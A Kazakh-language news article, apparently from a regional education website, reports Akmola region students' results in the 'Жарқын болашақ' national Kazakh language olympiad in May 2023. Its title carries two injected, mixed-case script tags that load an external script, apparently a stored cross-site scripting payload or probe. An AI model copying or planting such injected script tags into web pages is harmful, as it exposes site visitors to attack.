«Жарқын болашақ» республикалық қазақ тілі олимпиадасына қатысу қорытындылары туралы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

10.05.2023

2023 жылғы 6 мамыр күні, Астана қаласында «NURORDA» мектеп-лицейінің базасында, «Жарқын болашақ» республикалық қазақ тілі олимпиадасының қорытынды кезеңі өтті.

 «Жарқын болашақ» олимпиадасы «Білім-инновация» халықаралық қоғамдық қоры тарапынан жыл сайын өткізілетін олимпиада болып табылады.

Олимпиаданың мақсаты:

  • мемлекеттік тілдің қолданылу аясын кеңейту;
  • қазақ халқының мәдени, әдеби және рухани қазыналарын кеңінен насихаттау;
  • оқушылардың шығармашылық, ізденушілік қабілеттерін, мәдени дүниетанымын дамыту.

Олимпиадасының негізгі міндеттері:

  • оқушылардың қазақ халқының тіліне, әдебиетіне, салт-дәстүрлеріне, тарихына және мәдениетіне деген қызығушылығын арттыру, қазақ халқының тарихын үйреніп, білуге ынталандыру;
  • тұлғаның өз-өзін дамытуына және өзіндік қабілеттерін жетілдіруіне жағдай жасау.

«Жарқын болашақ» олимпиадасына қазақ және орыс тілдерінде оқытатын жалпы білім беретін мектептердің 7-11 сынып оқушылары қатысты (13-18 жас аралығы).

«Жарқын болашақ» олимпиадасы 5 бағыт бойынша өткізілді:

1.«Бейнелеушілер» (қазақ әдебиетіндегі шығармаларды комикс жанрында салу);

2.«Білгірлер бәйгесі» (мақал-мәтел, жұмбақ, ертегілер бойынша сайыс);

3.«Жас қаламгер» (жазбаша шығармашылық жұмыс),

4.«Сөз шеберлері» (Көпшілік алдында белгілі бір тақырыпта сөз сөйлеу);

5.«Әнші-бұлбұлдар» (ән айту).

«Жарқын болашақ» олимпиадасы үш кезеңнен тұрады:

1-кезең – аудандық кезең. Ол 16-31 наурыз аралығы;

2-кезең – облыстық кезең. Ол 20-22 cәуір аралығы;

3-кезең – республикалық кезең (финал).

Ақмола облысынан 2022-2023 оқу жылының «Жарқын болашақ» республикалық қазақ тілі олимпиадасының облыстық облыстық кезеңінің І-дәрежелі дипломының 9 иегерлері қатысты.

         Республикалық олимпиаданың қорытындысы бойынша ІІІ-дәрежелі дипломдармен және қола медальдармен марапатталды:

1.«Бейнелеушілер» (орыс тілі)  бағыты бойынша Алиферова Анастасия - Аршалы ауданы, Арнасай ауылының жалпы орта білім беретін мектебінің 11-сынып оқушысы;

2.«Жас қаламгер» (қазақ тілі)  бағыты бойынша Құрман Әділбек - Щучинск қаласының «Білім-инновация» ІТ лицей-интернатының 10-сынып оқушысы;

3.«Әнші-бұлбұлдар» (қазақ тілі)  бағыты бойынша Султанова Индира  -  Зеренді ауданы, Зеренді ауылының № 1 жалпы орта білім беретін мектебінің 10-сынып оқушысы;

4.«Әнші-бұлбұлдар» (орыс тілі)  бағыты бойынша Титова Эвелина - Көкшетау қаласы, Көкшетау қаласының техниқалық лицейнің 8-сынып оқушысы.

         Шын жүректен құттықтаймыз және шығармашылық табыс тілейміз!!!

Просмотров: 1058


Пікір қосу



Деректерді қолтаңбаға қосу